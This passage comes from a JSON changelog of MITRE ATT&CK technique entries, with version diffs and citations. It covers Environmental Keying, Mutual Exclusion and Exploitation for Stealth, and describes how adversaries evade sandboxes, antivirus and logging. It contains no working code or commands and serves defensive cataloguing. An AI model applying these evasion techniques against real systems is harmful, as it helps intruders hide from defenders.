class=\"diff_chg\">l&nbsp;values,&nbsp;environmental&nbsp;keying&nbsp;can&nbsp;make&nbsp;sand</span>bo<span class=\"diff_add\">x&nbsp;detection,&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">eying&nbsp;can&nbsp;make&nbsp;sandbox&nbsp;detection,&nbsp;anti-virus&nbsp;detection,&nbsp;crow</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nti-virus&nbsp;detection,&nbsp;cro</span>w<span class=\"diff_chg\">dsourcing&nbsp;of&nbsp;information</span>,&nbsp;<span class=\"diff_chg\">and&nbsp;rever</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">dsourcing&nbsp;of&nbsp;information,&nbsp;and&nbsp;reverse&nbsp;engineering</span>&nbsp;difficult.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">se&nbsp;engineering</span>&nbsp;difficult.(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepap</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)<span class=\"diff_chg\">(Citation:&nbsp;Eb</span>ow<span class=\"diff_chg\">la:&nbsp;Gen</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">er)<span class=\"diff_chg\">&nbsp;These&nbsp;difficulties&nbsp;can&nbsp;sl</span>ow<span class=\"diff_chg\">&nbsp;do</span>w<span class=\"diff_chg\">n&nbsp;the&nbsp;incident&nbsp;response&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">etic&nbsp;Mal</span>w<span class=\"diff_chg\">are)&nbsp;These&nbsp;difficulties&nbsp;can&nbsp;slow&nbsp;down&nbsp;the&nbsp;incident&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">rocess&nbsp;and&nbsp;help&nbsp;adversaries&nbsp;hide&nbsp;their</span>&nbsp;tactics,&nbsp;techniques,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">response&nbsp;process&nbsp;and&nbsp;help&nbsp;adversaries&nbsp;hide&nbsp;their</span>&nbsp;tactics,&nbsp;te</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;procedures&nbsp;(TTPs).&nbsp;&nbsp;Similar&nbsp;to&nbsp;[Obfuscated&nbsp;Files&nbsp;or&nbsp;Info</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques,&nbsp;and&nbsp;procedures&nbsp;(TTPs).&nbsp;&nbsp;Similar&nbsp;to&nbsp;[Obfuscated&nbsp;Fil</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmation](https://attack.mitre.org/techniques/T1027),&nbsp;adversa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;or&nbsp;Information](https://attack.mitre.org/techniques/T1027</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ries&nbsp;may&nbsp;use&nbsp;environmental&nbsp;keying&nbsp;to&nbsp;help&nbsp;protect&nbsp;their&nbsp;TTPs</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">),&nbsp;adversaries&nbsp;may&nbsp;use&nbsp;environmental&nbsp;keying&nbsp;to&nbsp;help&nbsp;protect&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;evade&nbsp;detection.&nbsp;Environmental&nbsp;keying&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">their&nbsp;TTPs&nbsp;and&nbsp;evade&nbsp;detection.&nbsp;Environmental&nbsp;keying&nbsp;may&nbsp;be&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">liver&nbsp;an&nbsp;encrypted&nbsp;payload&nbsp;to&nbsp;the&nbsp;target&nbsp;that&nbsp;will&nbsp;use&nbsp;targe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">used&nbsp;to&nbsp;deliver&nbsp;an&nbsp;encrypted&nbsp;payload&nbsp;to&nbsp;the&nbsp;target&nbsp;that&nbsp;will</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t-specific&nbsp;values&nbsp;to&nbsp;decrypt&nbsp;the&nbsp;payload&nbsp;before&nbsp;execution.(C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;use&nbsp;target-specific&nbsp;values&nbsp;to&nbsp;decrypt&nbsp;the&nbsp;payload&nbsp;before&nbsp;ex</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)(Citation:&nbsp;EK&nbsp;Impeding&nbsp;M</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecution.(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)(Citation:&nbsp;EK&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alware&nbsp;Analysis)(Citation:&nbsp;Environmental&nbsp;Keyed&nbsp;HTA)(Citation</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Impeding&nbsp;Malware&nbsp;Analysis)(Citation:&nbsp;Environmental&nbsp;Keyed&nbsp;HTA</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">:&nbsp;<span class=\"diff_chg\">Demiguise&nbsp;Guardrail&nbsp;Router&nbsp;Logo)&nbsp;By&nbsp;utilizing&nbsp;target-speci</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)(Citation:&nbsp;<span class=\"diff_chg\">E</span>b<span class=\"diff_chg\">owla:&nbsp;Genetic&nbsp;Malware)(Citation:&nbsp;Demiguise&nbsp;Gua</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">fic&nbsp;values&nbsp;to&nbsp;decrypt&nbsp;the&nbsp;payload&nbsp;the&nbsp;adversary&nbsp;can&nbsp;avoid&nbsp;pa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">rdrail&nbsp;Router&nbsp;Logo)&nbsp;By&nbsp;utilizing&nbsp;target-specific&nbsp;values&nbsp;to&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ckaging&nbsp;the&nbsp;decryption&nbsp;key&nbsp;with&nbsp;the&nbsp;payload&nbsp;or&nbsp;sending&nbsp;it&nbsp;ov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ecrypt&nbsp;the&nbsp;payload&nbsp;the&nbsp;adversary&nbsp;can&nbsp;avoid&nbsp;packaging&nbsp;the&nbsp;dec</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">er&nbsp;a&nbsp;potentially&nbsp;monitored&nbsp;network&nbsp;connection.&nbsp;Depending&nbsp;on&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ryption&nbsp;key&nbsp;with&nbsp;the&nbsp;payload&nbsp;or&nbsp;sending&nbsp;it&nbsp;over&nbsp;a&nbsp;potentiall</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">the&nbsp;technique&nbsp;for&nbsp;gathering&nbsp;target-specific&nbsp;values,&nbsp;reverse&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">y&nbsp;monitored&nbsp;network&nbsp;connection.&nbsp;Depending&nbsp;on&nbsp;the&nbsp;technique&nbsp;f</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">engineering&nbsp;of&nbsp;the&nbsp;encrypted&nbsp;payload&nbsp;can&nbsp;</span>b<span class=\"diff_chg\">e</span>&nbsp;exceptionally&nbsp;di</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">or&nbsp;gathering&nbsp;target-specific&nbsp;values,&nbsp;reverse&nbsp;engineering&nbsp;of&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fficult.(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)&nbsp;This&nbsp;can&nbsp;be&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">the&nbsp;encrypted&nbsp;payload&nbsp;can&nbsp;be</span>&nbsp;exceptionally&nbsp;difficult.(Citati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;to&nbsp;prevent&nbsp;exposure&nbsp;of&nbsp;capabilities&nbsp;in&nbsp;environments&nbsp;that</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)&nbsp;This&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;prevent&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;are&nbsp;not&nbsp;intended&nbsp;to&nbsp;be&nbsp;compromised&nbsp;or&nbsp;operated&nbsp;within.&nbsp;&nbsp;Lik</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">exposure&nbsp;of&nbsp;capabilities&nbsp;in&nbsp;environments&nbsp;that&nbsp;are&nbsp;not&nbsp;intend</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;other&nbsp;[Execution&nbsp;Guardrails](https://attack.mitre.org/tech</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;to&nbsp;be&nbsp;compromised&nbsp;or&nbsp;operated&nbsp;within.&nbsp;&nbsp;Like&nbsp;other&nbsp;[Execut</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T1480),&nbsp;environmental&nbsp;keying&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;prevent&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion&nbsp;Guardrails](https://attack.mitre.org/techniques/T1480),&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xposure&nbsp;of&nbsp;capabilities&nbsp;in&nbsp;environments&nbsp;that&nbsp;are&nbsp;not&nbsp;intende</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">environmental&nbsp;keying&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;prevent&nbsp;exposure&nbsp;of&nbsp;capa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;to&nbsp;be&nbsp;compromised&nbsp;or&nbsp;operated&nbsp;within.&nbsp;This&nbsp;activity&nbsp;is&nbsp;dis</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bilities&nbsp;in&nbsp;environments&nbsp;that&nbsp;are&nbsp;not&nbsp;intended&nbsp;to&nbsp;be&nbsp;comprom</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tinct&nbsp;from&nbsp;typical&nbsp;[Virtualization/Sandbox&nbsp;Evasion](https://</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ised&nbsp;or&nbsp;operated&nbsp;within.&nbsp;This&nbsp;activity&nbsp;is&nbsp;distinct&nbsp;from&nbsp;typi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T1497).&nbsp;While&nbsp;use&nbsp;of&nbsp;[Virtualiza</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cal&nbsp;[Virtualization/Sandbox&nbsp;Evasion](https://attack.mitre.or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion/Sandbox&nbsp;Evasion](https://attack.mitre.org/techniques/T1</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/techniques/T1497).&nbsp;While&nbsp;use&nbsp;of&nbsp;[Virtualization/Sandbox&nbsp;Ev</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">497)&nbsp;may&nbsp;involve&nbsp;checking&nbsp;for&nbsp;known&nbsp;sandbox&nbsp;values&nbsp;and&nbsp;conti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">asion](https://attack.mitre.org/techniques/T1497)&nbsp;may&nbsp;involv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nuing&nbsp;with&nbsp;execution&nbsp;only&nbsp;if&nbsp;there&nbsp;is&nbsp;no&nbsp;match,&nbsp;the&nbsp;use&nbsp;of&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;checking&nbsp;for&nbsp;known&nbsp;sandbox&nbsp;values&nbsp;and&nbsp;continuing&nbsp;with&nbsp;exec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nvironmental&nbsp;keying&nbsp;will&nbsp;involve&nbsp;checking&nbsp;for&nbsp;an&nbsp;expected&nbsp;ta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ution&nbsp;only&nbsp;if&nbsp;there&nbsp;is&nbsp;no&nbsp;match,&nbsp;the&nbsp;use&nbsp;of&nbsp;environmental&nbsp;ke</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rget-specific&nbsp;value&nbsp;that&nbsp;must&nbsp;match&nbsp;for&nbsp;decryption&nbsp;and&nbsp;subse</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ying&nbsp;will&nbsp;involve&nbsp;checking&nbsp;for&nbsp;an&nbsp;expected&nbsp;target-specific&nbsp;v</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">quent&nbsp;execution&nbsp;to&nbsp;be&nbsp;successful.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alue&nbsp;that&nbsp;must&nbsp;match&nbsp;for&nbsp;decryption&nbsp;and&nbsp;subsequent&nbsp;execution</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;be&nbsp;successful.</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1055: Do Not Mitigate"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0474: Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-09-19 14:00:03.401000+00:00",
                    "modified": "2026-04-15 20:07:21.724000+00:00",
                    "name": "Mutual Exclusion",
                    "description": "Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)\n\nWhile local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)\n\nIn Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)\n\nMutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1480/002",
                            "external_id": "T1480.002"
                        },
                        {
                            "source_name": "Intezer RedXOR 2021",
                            "description": "Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved September 19, 2024.",
                            "url": "https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
                        },
                        {
                            "source_name": "Sans Mutexes 2012",
                            "description": "Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.",
                            "url": "https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/"
                        },
                        {
                            "source_name": "ICS Mutexes 2015",
                            "description": "Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names to Evade Detection. Retrieved September 19, 2024.",
                            "url": "https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/"
                        },
                        {
                            "source_name": "Microsoft Mutexes",
                            "description": "Microsoft. (2022, March 11). Mutexes. Retrieved September 19, 2024.",
                            "url": "https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes"
                        },
                        {
                            "source_name": "Deep Instinct BPFDoor 2023",
                            "description": "Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor Malware Evolves \u2013 Stealthy Sniffing Backdoor Ups Its Game. Retrieved September 19, 2024.",
                            "url": "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Pooja Natarajan, NEC Corporation India",
                        "Nagahama Hiroki \u2013 NEC Corporation Japan"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:07:21.724000+00:00\", \"old_value\": \"2025-04-15 22:50:39.088000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1055: Do Not Mitigate"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0132: Detection of Mutex-Based Execution Guardrails Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 13:36:04.483000+00:00",
                    "name": "Exploitation for Stealth",
                    "description": "Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. \n\nAdversaries may exploit a system or application vulnerability to avoid detection while maintaining access within an environment. Exploitation occurs when an adversary leverages a programming flaw to execute code in a manner that minimizes visibility or blends in with legitimate activity. \n\nRather than directly disabling defenses, adversaries may use exploitation to circumvent monitoring and logging mechanisms. This can include abusing vulnerabilities in logging pipelines, security tools, or cloud infrastructure to evade audit trails, suppress alerts, or operate without generating telemetry. \n\nAdversaries may identify these opportunities through prior reconnaissance or by performing discovery of security controls after initial access. In some cases, vulnerabilities in SaaS or public cloud environments may be exploited to evade logging, obscure activity, or deploy infrastructure that remains hidden from standard monitoring tools.(Citation: Bypassing CloudTrail in AWS Service Catalog)(Citation: GhostToken GCP flaw)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1211",
                            "external_id": "T1211"
                        },
                        {
                            "source_name": "Bypassing CloudTrail in AWS Service Catalog",
                            "description": "Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.",
                            "url": "https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/"
                        },
                        {
                            "source_name": "GhostToken GCP flaw",
                            "description": "Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.",
                            "url": "https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "John Lambert, Microsoft Threat Intelligence Center"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS",
                        "SaaS",
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 13:36:04.483000+00:00\", \"old_value\": \"2025-10-24 17:49:39.960000+00:00\"}, \"root['name']\": {\"new_value\": \"Exploitation for Stealth\", \"old_value\": \"Exploitation for Defense Evasion\"}, \"root['description']\": {\"new_value\": \"Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. \\n\\nAdversaries may exploit a system or application vulnerability to avoid detection while maintaining access within an environment. Exploitation occurs when an adversary leverages a programming flaw to execute code in a manner that minimizes visibility or blends in with legitimate activity. \\n\\nRather than directly disabling defenses, adversaries may use exploitation to circumvent monitoring and logging mechanisms. This can include abusing vulnerabilities in logging pipelines, security tools, or cloud infrastructure to evade audit trails, suppress alerts, or operate without generating telemetry. \\n\\nAdversaries may identify these opportunities through prior reconnaissance or by performing discovery of security controls after initial access. In some cases, vulnerabilities in SaaS or public cloud environments may be exploited to evade logging, obscure activity, or deploy infrastructure that remains hidden from standard monitoring tools.(Citation: Bypassing CloudTrail in AWS Service Catalog)(Citation: GhostToken GCP flaw)\", \"old_value\": \"Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\\n\\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\\n\\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,7 @@\\n-Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\\n+Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. \\n \\n-Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\\n+Adversaries may exploit a system or application vulnerability to avoid detection while maintaining access within an environment. Exploitation occurs when an adversary leverages a programming flaw to execute code in a manner that minimizes visibility or blends in with legitimate activity. \\n \\n-There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)\\n+Rather than directly disabling defenses, adversaries may use exploitation to circumvent monitoring and logging mechanisms. This can include abusing vulnerabilities in logging pipelines, security tools, or cloud infrastructure to evade audit trails, suppress alerts, or operate without generating telemetry. \\n+\\n+Adversaries may identify these opportunities through prior reconnaissance or by performing discovery of security controls after initial access. In some cases, vulnerabilities in SaaS or public cloud environments may be exploited to evade logging, obscure activity, or deploy infrastructure that remains hidden from standard monitoring tools.(Citation: Bypassing CloudTrail in AWS Service Catalog)(Citation: GhostToken GCP flaw)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Salesforce zero-day in facebook phishing attack\", \"description\": \"Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.\", \"url\": \"https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
